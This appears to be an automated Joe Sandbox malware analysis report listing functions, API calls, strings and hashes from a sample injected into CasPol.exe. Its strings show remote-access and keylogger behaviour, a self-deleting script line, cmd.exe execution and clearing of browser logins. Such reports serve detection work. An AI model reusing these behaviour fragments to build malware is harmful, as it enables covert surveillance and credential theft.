                                                                              • Opcode Fuzzy Hash: 24d082c4c32556380d94a426a0797d769337f58152c77e2724906da83e703e03
                                                                              • Instruction Fuzzy Hash: 9AF01232505600BBE620EB59E8C5C1773E9EB827147A9482BF408F7641CB3DFCC48A6C
                                                                              APIs
                                                                              • _free.LIBCMT ref: 00443305
                                                                                • Part of subcall function 00446AC5: HeapFree.KERNEL32(00000000,00000000,?,0044FA50,0000000A,00000000,0000000A,00000000,?,0044FCF4,0000000A,00000007,0000000A,?,00450205,0000000A), ref: 00446ADB
                                                                                • Part of subcall function 00446AC5: GetLastError.KERNEL32(0000000A,?,0044FA50,0000000A,00000000,0000000A,00000000,?,0044FCF4,0000000A,00000007,0000000A,?,00450205,0000000A,0000000A), ref: 00446AED
                                                                              • _free.LIBCMT ref: 00443317
                                                                              • _free.LIBCMT ref: 0044332A
                                                                              • _free.LIBCMT ref: 0044333B
                                                                              • _free.LIBCMT ref: 0044334C
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.4163660136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                              • String ID:
                                                                              • API String ID: 776569668-0
                                                                              • Opcode ID: ab870860b33c9a3cd44b9e2e3565930e421ff68453c6808a8f097650461ead98
                                                                              • Instruction ID: 76e6a482bc9a1727a28655d1f271e5fc3ecde01143ea680422932a64b095765e
                                                                              • Opcode Fuzzy Hash: ab870860b33c9a3cd44b9e2e3565930e421ff68453c6808a8f097650461ead98
                                                                              • Instruction Fuzzy Hash: B9F05EF08075209FAB12AF2DBD014893BA0B786755306413BF41EB2772EB380D95DB8E
                                                                              APIs
                                                                              • GetWindowThreadProcessId.USER32(?,?), ref: 00416768
                                                                              • GetWindowTextW.USER32(?,?,0000012C), ref: 0041679A
                                                                              • IsWindowVisible.USER32(?), ref: 004167A1
                                                                                • Part of subcall function 0041B37D: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041B395
                                                                                • Part of subcall function 0041B37D: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041B3A8
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.4163660136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ProcessWindow$Open$TextThreadVisible
                                                                              • String ID: (FG
                                                                              • API String ID: 3142014140-2273637114
                                                                              • Opcode ID: eb2bca1e6d2cb62f49359eca3696a5b788354994f25ad01b61c56b8fabd667be
                                                                              • Instruction ID: 6337817d5adb2ff800b6fe7f9081d1b6a06097940366009b721c4d78a1625a25
                                                                              • Opcode Fuzzy Hash: eb2bca1e6d2cb62f49359eca3696a5b788354994f25ad01b61c56b8fabd667be
                                                                              • Instruction Fuzzy Hash: FD71E6321082414AC325FB61D8A5ADFB3E4AFE4319F50453EF58A530E1EF746A49C79A
                                                                              APIs
                                                                              • GetKeyboardLayoutNameA.USER32(?), ref: 00409601
                                                                                • Part of subcall function 004041F1: socket.WS2_32(?,00000001,00000006), ref: 00404212
                                                                                • Part of subcall function 0040428C: connect.WS2_32(?,?,?), ref: 004042A5
                                                                                • Part of subcall function 0041B6AA: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,?,00000000,00409689,00473EE8,?,00473EE8,00000000,00473EE8,00000000), ref: 0041B6BF
                                                                                • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.4163660136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CreateFileKeyboardLayoutNameconnectsendsocket
                                                                              • String ID: XCG$`AG$>G
                                                                              • API String ID: 2334542088-2372832151
                                                                              • Opcode ID: 8ea2362fd4b99c9916fc71bf3fc372679012ea805d421a90e43c80cd1edb4417
                                                                              • Instruction ID: 7adbea44916697806613a62f0197ef330eb15d5bc584e2d7fa9685cab7613629
                                                                              • Opcode Fuzzy Hash: 8ea2362fd4b99c9916fc71bf3fc372679012ea805d421a90e43c80cd1edb4417
                                                                              • Instruction Fuzzy Hash: 865143321042405BC325F775D8A2AEF73D5AFE4308F50483FF84A671E2EE785949C69A
                                                                              APIs
                                                                              • GetModuleFileNameA.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe,00000104), ref: 00442714
                                                                              • _free.LIBCMT ref: 004427DF
                                                                              • _free.LIBCMT ref: 004427E9
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.4163660136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: _free$FileModuleName
                                                                              • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                              • API String ID: 2506810119-3657627342
                                                                              • Opcode ID: 517ef8501d39ed80bd5d3989cd54e6cd38b7eb486680de81052e85c6479d25b4
                                                                              • Instruction ID: 3cff5717343a4e3a710d875500e96c622d597d45f5ef159119de948e6b6562f0
                                                                              • Opcode Fuzzy Hash: 517ef8501d39ed80bd5d3989cd54e6cd38b7eb486680de81052e85c6479d25b4
                                                                              • Instruction Fuzzy Hash: 3E31B371A00218AFEB21DF9ADD81D9EBBFCEB85314F54406BF804A7311D6B88E41DB59
                                                                              APIs
                                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00403A2A
                                                                                • Part of subcall function 0041AB38: GetCurrentProcessId.KERNEL32(00000000,74DF3530,00000000,?,?,?,?,00465900,0040C07B,.vbs,?,?,?,?,?,004742F8), ref: 0041AB5F
                                                                                • Part of subcall function 004176B6: CloseHandle.KERNEL32(00403AB9,?,?,00403AB9,00465324), ref: 004176CC
                                                                                • Part of subcall function 004176B6: CloseHandle.KERNEL32($SF,?,?,00403AB9,00465324), ref: 004176D5
                                                                                • Part of subcall function 0041B61A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B633
                                                                              • Sleep.KERNEL32(000000FA,00465324), ref: 00403AFC
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.4163660136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CloseFileHandle$CreateCurrentModuleNameProcessSleep
                                                                              • String ID: /sort "Visit Time" /stext "$8>G
                                                                              • API String ID: 368326130-2663660666
                                                                              • Opcode ID: dfa64f9047554a707b91e77b14ac24b19fa43de0bfeca1bd13ed9ec92fdcbe0b
                                                                              • Instruction ID: 7eda923cdb9144c2d3fbd791e6ccfb72172be11f11f2a08a3aebfaec1b2861d2
                                                                              • Opcode Fuzzy Hash: dfa64f9047554a707b91e77b14ac24b19fa43de0bfeca1bd13ed9ec92fdcbe0b
                                                                              • Instruction Fuzzy Hash: E5317331A0021456CB14FBB6DC969EE7775AF90318F40017FF906B71D2EF385A8ACA99
                                                                              APIs
                                                                                • Part of subcall function 0041B58F: CreateFileW.KERNELBASE(?,40000000,00000000,00000000,00000002,00000080,00000000,?,00000000,?,?,00000000,0041B6A5,00000000,00000000,?), ref: 0041B5CE
                                                                              • ShellExecuteW.SHELL32(?,open,00000000), ref: 0040C632
                                                                              • ExitProcess.KERNEL32 ref: 0040C63E
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.4163660136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CreateExecuteExitFileProcessShell
                                                                              • String ID: fso.DeleteFile(Wscript.ScriptFullName)$open
                                                                              • API String ID: 2309964880-3562070623
                                                                              • Opcode ID: 390205f58295ca3481fe5ab8602b7fa4db45e117a05dec8e4925fefabcc5de7f
                                                                              • Instruction ID: 568fed376c07edf90cd2df9b8610832c68d616ac56d6d0e00b2c9eff25916ff3
                                                                              • Opcode Fuzzy Hash: 390205f58295ca3481fe5ab8602b7fa4db45e117a05dec8e4925fefabcc5de7f
                                                                              • Instruction Fuzzy Hash: 692145315042405AC324FB25E8969BF77E4AFD1319F50493FF482620F2EF38AA49C69A
                                                                              APIs
                                                                              • GetLocalTime.KERNEL32(?,?,00000000), ref: 0040A884
                                                                              • wsprintfW.USER32 ref: 0040A905
                                                                                • Part of subcall function 00409D58: SetEvent.KERNEL32(?,?,?,0040AF3F,?,?,?,?,?,00000000), ref: 00409D84
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.4163660136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: EventLocalTimewsprintf
                                                                              • String ID: [%04i/%02i/%02i %02i:%02i:%02i $]
                                                                              • API String ID: 1497725170-1359877963
                                                                              • Opcode ID: 1d10a37c34326f04bd8ec3fc0ae341709748cacc557a8cfb832170af7926ff1e
                                                                              • Instruction ID: 8a7b6ca92c081f7f17d03b5bac770d689c192d548357e869dbc211d44db93d1d
                                                                              • Opcode Fuzzy Hash: 1d10a37c34326f04bd8ec3fc0ae341709748cacc557a8cfb832170af7926ff1e
                                                                              • Instruction Fuzzy Hash: BB118172400118AACB18BB56EC55CFE77BCAE48325F00013FF842620D1EF7C5A86C6E9
                                                                              APIs
                                                                                • Part of subcall function 0040A876: GetLocalTime.KERNEL32(?,?,00000000), ref: 0040A884
                                                                                • Part of subcall function 0040A876: wsprintfW.USER32 ref: 0040A905
                                                                                • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                              • CreateThread.KERNEL32(00000000,00000000,Function_00009993,?,00000000,00000000), ref: 0040A691
                                                                              • CreateThread.KERNEL32(00000000,00000000,Function_000099B5,?,00000000,00000000), ref: 0040A69D
                                                                              • CreateThread.KERNEL32(00000000,00000000,004099C1,?,00000000,00000000), ref: 0040A6A9
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.4163660136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CreateThread$LocalTime$wsprintf
                                                                              • String ID: Online Keylogger Started
                                                                              • API String ID: 112202259-1258561607
                                                                              • Opcode ID: 54b0b085ce57371670bcfd3b34d5d472438fbf033b6369da0e754369fe511495
                                                                              • Instruction ID: 3917ec9fcb61ff418b23047d8298326e5ff7fd14d64f683336ff9c65b5464130
                                                                              • Opcode Fuzzy Hash: 54b0b085ce57371670bcfd3b34d5d472438fbf033b6369da0e754369fe511495
                                                                              • Instruction Fuzzy Hash: DE01C4916003093AE62076368C87DBF3A6DCA813A8F40043EF541362C3E97D5D5582FB
                                                                              APIs
                                                                              • CloseHandle.KERNEL32(00000000,00000000,`@,?,0044A991,`@,0046DD28,0000000C), ref: 0044AAC9
                                                                              • GetLastError.KERNEL32(?,0044A991,`@,0046DD28,0000000C), ref: 0044AAD3
                                                                              • __dosmaperr.LIBCMT ref: 0044AAFE
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.4163660136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CloseErrorHandleLast__dosmaperr
                                                                              • String ID: `@
                                                                              • API String ID: 2583163307-951712118
                                                                              • Opcode ID: e5cf9cf0863519c22c59f520a66439faf8bffb0939932f5db486048d3d382d3d
                                                                              • Instruction ID: 1bd3c876d7044edfb1a6812000b34c32b622226010ed5631802de8abdb52b33d
                                                                              • Opcode Fuzzy Hash: e5cf9cf0863519c22c59f520a66439faf8bffb0939932f5db486048d3d382d3d
                                                                              • Instruction Fuzzy Hash: F8018E366446201AF7206674698577F77898B82738F2A027FF904972D2DE6DCCC5C19F
                                                                              APIs
                                                                              • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00404B26), ref: 00404B40
                                                                              • CloseHandle.KERNEL32(?,?,?,?,00404B26), ref: 00404B98
                                                                              • SetEvent.KERNEL32(?,?,?,?,00404B26), ref: 00404BA7
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.4163660136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CloseEventHandleObjectSingleWait
                                                                              • String ID: Connection Timeout
                                                                              • API String ID: 2055531096-499159329
                                                                              • Opcode ID: 9041f7ae570b413ce327d744802055146d1c38930b1ad49fa8d24b0939116539
                                                                              • Instruction ID: ea4abd021a31a941d528121f8d879e106695b0b6a7a7fd2d86c7f06b9a048df4
                                                                              • Opcode Fuzzy Hash: 9041f7ae570b413ce327d744802055146d1c38930b1ad49fa8d24b0939116539
                                                                              • Instruction Fuzzy Hash: 7A01F5B1940B41AFD325BB3A9C4645ABBE4AB45315700053FF6D392BB1DA38E8408B5A
                                                                              APIs
                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 0040CDC9
                                                                              • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040CE08
                                                                                • Part of subcall function 004347BD: _Yarn.LIBCPMT ref: 004347DC
                                                                                • Part of subcall function 004347BD: _Yarn.LIBCPMT ref: 00434800
                                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 0040CE2C
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.4163660136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Yarnstd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throw
                                                                              • String ID: bad locale name
                                                                              • API String ID: 3628047217-1405518554
                                                                              • Opcode ID: 2c952230bb5508a40ba9b400b3509c8dd800ec2376424fb743b9d3d13ecaa97f
                                                                              • Instruction ID: 69d9b4558c1556c2c918d31b5ea24064f6fee533cc814fb99c42b36f0b05f267
                                                                              • Opcode Fuzzy Hash: 2c952230bb5508a40ba9b400b3509c8dd800ec2376424fb743b9d3d13ecaa97f
                                                                              • Instruction Fuzzy Hash: 1AF08171400204EAC724FB23D853ACA73A49F54748F90497FB506214D2EF38A618CA8C
                                                                              APIs
                                                                              • ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 004151F4
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.4163660136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ExecuteShell
                                                                              • String ID: /C $cmd.exe$open
                                                                              • API String ID: 587946157-3896048727
                                                                              • Opcode ID: 6699625853e23096ac9cad3f7578a7bff2c993ae7ed2a6c2b658dd2f5a42760b
                                                                              • Instruction ID: 3ae8c2b06d9b1922b9065f49b1512f2a4b1b87a12dccb2265ed1bd098505db2c
                                                                              • Opcode Fuzzy Hash: 6699625853e23096ac9cad3f7578a7bff2c993ae7ed2a6c2b658dd2f5a42760b
                                                                              • Instruction Fuzzy Hash: D8E030701043006AC708FB61DC95C7F77AC9A80708F10083EB542A21E2EF3CA949C65E
                                                                              APIs
                                                                              • TerminateThread.KERNEL32(Function_000099A9,00000000,004742F8,pth_unenc,0040BF26,004742E0,004742F8,?,pth_unenc), ref: 0040AFC9
                                                                              • UnhookWindowsHookEx.USER32(004740F8), ref: 0040AFD5
                                                                              • TerminateThread.KERNEL32(Function_00009993,00000000,?,pth_unenc), ref: 0040AFE3
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.4163660136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: TerminateThread$HookUnhookWindows
                                                                              • String ID: pth_unenc
                                                                              • API String ID: 3123878439-4028850238
                                                                              • Opcode ID: 46dff24612c1799e978f47a7720dcdfa0824c6f48cf00f8dbc5bb460590095c7
                                                                              • Instruction ID: c35477c7b81069fed5c639b3d306817a7c517f63bcb5e1090982200d4e51bed9
                                                                              • Opcode Fuzzy Hash: 46dff24612c1799e978f47a7720dcdfa0824c6f48cf00f8dbc5bb460590095c7
                                                                              • Instruction Fuzzy Hash: 32E01DB1209317DFD3101F546C84825B799EB44356324047FF6C155252C5798C54C759
                                                                              APIs
                                                                              • GetModuleHandleA.KERNEL32(User32.dll,GetCursorInfo), ref: 0040143A
                                                                              • GetProcAddress.KERNEL32(00000000), ref: 00401441
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.4163660136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: AddressHandleModuleProc
                                                                              • String ID: GetCursorInfo$User32.dll
                                                                              • API String ID: 1646373207-2714051624
                                                                              • Opcode ID: f39e1638c21b7beb4c7105e5daed03b820dcbd0345c10e5d325762a4e30a7452
                                                                              • Instruction ID: fea3bfcfa5ad703f85b7dd8d5f3eac54d033561bc9bd2fc33d3800e380b32b62
                                                                              • Opcode Fuzzy Hash: f39e1638c21b7beb4c7105e5daed03b820dcbd0345c10e5d325762a4e30a7452
                                                                              • Instruction Fuzzy Hash: 51B092B868A3059BC7306BE0BD0EA093B24EA44703B1000B2F087C12A1EB7880809A6E
                                                                              APIs
                                                                              • LoadLibraryA.KERNEL32(User32.dll,GetLastInputInfo), ref: 004014DF
                                                                              • GetProcAddress.KERNEL32(00000000), ref: 004014E6
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.4163660136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: AddressLibraryLoadProc
                                                                              • String ID: GetLastInputInfo$User32.dll
                                                                              • API String ID: 2574300362-1519888992
                                                                              • Opcode ID: 3fc7b1db73b7af1b2a271cc819159fe1e403f0356e3f7920f37c5b1d7d3a7c56
                                                                              • Instruction ID: 425bdc246283df71b7ad83aa0519e38d385401eab2b134f4ae8d574857069069
                                                                              • Opcode Fuzzy Hash: 3fc7b1db73b7af1b2a271cc819159fe1e403f0356e3f7920f37c5b1d7d3a7c56
                                                                              • Instruction Fuzzy Hash: D7B092B85843849BC7202BE0BC0DA297BA4FA48B43720447AF406D11A1EB7881809F6F
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.4163660136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: __alldvrm$_strrchr
                                                                              • String ID:
                                                                              • API String ID: 1036877536-0
                                                                              • Opcode ID: 63f75d4c6ddf9dfadee5a9a28b1451e266bcc439c32975fae3941ae33d1a5297
                                                                              • Instruction ID: 63a095292c52d92af2bf19a392fdfa9b0d117a80b68c781492b1ecdde0b53e6f
                                                                              • Opcode Fuzzy Hash: 63f75d4c6ddf9dfadee5a9a28b1451e266bcc439c32975fae3941ae33d1a5297
                                                                              • Instruction Fuzzy Hash: 60A168729042469FFB21CF58C8817AEBBE2EF55314F24416FE5849B382DA3C8D45C759
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.4163660136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: d2c3ac181d975cfacaee5c3ec40136b8bdf5b2422b9dd14ab5655829a2308330
                                                                              • Instruction ID: 90b3d0a8f148eb65ba096d855dd205fb67a40d318d5acb0a54968c3478788488
                                                                              • Opcode Fuzzy Hash: d2c3ac181d975cfacaee5c3ec40136b8bdf5b2422b9dd14ab5655829a2308330
                                                                              • Instruction Fuzzy Hash: 10412B71A00744AFF724AF78CC41B6ABBE8EF88714F10452FF511DB291E679A9458788
                                                                              APIs
                                                                              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,?,00000000,?,?,000000FF,00000000,?,?), ref: 00404778
                                                                              • CreateThread.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 0040478C
                                                                              • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000,00000000,?,?,00000000), ref: 00404797
                                                                              • CloseHandle.KERNEL32(?,?,00000000,00000000,?,?,00000000), ref: 004047A0
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.4163660136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Create$CloseEventHandleObjectSingleThreadWait
                                                                              • String ID:
                                                                              • API String ID: 3360349984-0
                                                                              • Opcode ID: b29a8bcc01a21f7fe38ddc3438b80264c3974fc0b274f3a4a7c26760eb770a85
                                                                              • Instruction ID: f4983b6e647f91c6eb1a16b69ab68a2f9d5597509a23169db7b615edd0c6cdea
                                                                              • Opcode Fuzzy Hash: b29a8bcc01a21f7fe38ddc3438b80264c3974fc0b274f3a4a7c26760eb770a85
                                                                              • Instruction Fuzzy Hash: 34417171508301ABC700FB61CC55D7FB7E9AFD5315F00093EF892A32E2EA389909866A
                                                                              APIs
                                                                              Strings
                                                                              • [Cleared browsers logins and cookies.], xrefs: 0040B8DE
                                                                              • Cleared browsers logins and cookies., xrefs: 0040B8EF
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.4163660136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Sleep
                                                                              • String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.
                                                                              • API String ID: 3472027048-1236744412
                                                                              • Opcode ID: 75935dd92c54438d520984c0fbed3049675ace49491bc7afa837b165368f9319
                                                                              • Instruction ID: 8ec9c8031b8ac0664cfb8a22ca307bf710261ddd843e88104a77dac6ce00e7b7
                                                                              • Opcode Fuzzy Hash: 75935dd92c54438d520984c0fbed3049675ace49491bc7afa837b165368f9319
                                                                              • Instruction Fuzzy Hash: FA31891564C3816ACA11777514167EB6F958A93754F0884BFF8C4273E3DB7A480893EF
                                                                              APIs
                                                                                • Part of subcall function 0041265D: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,00000000,004742F8), ref: 00412679
                                                                                • Part of subcall function 0041265D: RegQueryValueExA.ADVAPI32(00000000,00000000,00000000,00000000,00000208,?), ref: 00412692
                                                                                • Part of subcall function 0041265D: RegCloseKey.ADVAPI32(00000000), ref: 0041269D
                                                                              • Sleep.KERNEL32(00000BB8), ref: 004115C3
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.4163660136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CloseOpenQuerySleepValue
                                                                              • String ID: @CG$exepath$BG
                                                                              • API String ID: 4119054056-3221201242
                                                                              • Opcode ID: 87f44056bfb88680dd3fb4540e9b2a816aacb5308ad949631011a61a52719725
                                                                              • Instruction ID: 48aadeccb903c06d46a934e3c92f1fe58b0119fffb77d403c20537554d94cb98
                                                                              • Opcode Fuzzy Hash: 87f44056bfb88680dd3fb4540e9b2a816aacb5308ad949631011a61a52719725
                                                                              • Instruction Fuzzy Hash: C721F4A0B002042BD614B77A6C06ABF724E8BD1308F00457FBD4AA72D3DE7D9D4581AD
                                                                              APIs
                                                                                • Part of subcall function 0041B6E6: GetForegroundWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041B6F6
                                                                                • Part of subcall function 0041B6E6: GetWindowTextLengthW.USER32(00000000), ref: 0041B6FF
                                                                                • Part of subcall function 0041B6E6: GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0041B729
                                                                              • Sleep.KERNEL32(000001F4), ref: 00409C95
                                                                              • Sleep.KERNEL32(00000064), ref: 00409D1F
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.4163660136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Window$SleepText$ForegroundLength
                                                                              • String ID: [ $ ]
                                                                              • API String ID: 3309952895-93608704
                                                                              • Opcode ID: 92cb9d2a2d6bf6289d44fec474a7e000b4a54ab88b054bee990bed59a71b9a03
                                                                              • Instruction ID: a5f4dc9a3e016f43683dc3f70dfd76a68f9d753ffdb665cb1c6be196efeb7d0c
                                                                              • Opcode Fuzzy Hash: 92cb9d2a2d6bf6289d44fec474a7e000b4a54ab88b054bee990bed59a71b9a03
                                                                              • Instruction Fuzzy Hash: 4611C0325082005BD218FB25DC17AAEB7A8AF51708F40047FF542221E3EF39AE1986DF
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.4163660136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 18f7b12d8fbd203e6fe2bd4c4423912ade4cd6e2ab417617722edd39325a2eb9
                                                                              • Instruction ID: c84c011be516b9a55b4d27d1f6be1bd7d35570b7e88518a67a440710abbdd315
                                                                              • Opcode Fuzzy Hash: 18f7b12d8fbd203e6fe2bd4c4423912ade4cd6e2ab417617722edd39325a2eb9
                                                                              • Instruction Fuzzy Hash: 780126F26097153EF62016796CC1F6B230CDF823B8B34073BF421652E1EAA8CC01506C
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.4163660136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 8aedf970bdaeb9d9c72bc659829c2e19759f544123fe9e87a80c2ba2346fca48
                                                                              • Instruction ID: e6f180ecc181abb5a77ec057abe27f8575e00a75e8bcf6cd4df5c03139e47140
                                                                              • Opcode Fuzzy Hash: 8aedf970bdaeb9d9c72bc659829c2e19759f544123fe9e87a80c2ba2346fca48
                                                                              • Instruction Fuzzy Hash: E10121F2A092163EB62016797DD0DA7260DDF823B8374033BF421722D2EAA88C004068
                                                                              APIs
                                                                              • ___BuildCatchObject.LIBVCRUNTIME ref: 0043810F
                                                                                • Part of subcall function 0043805C: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 0043808B
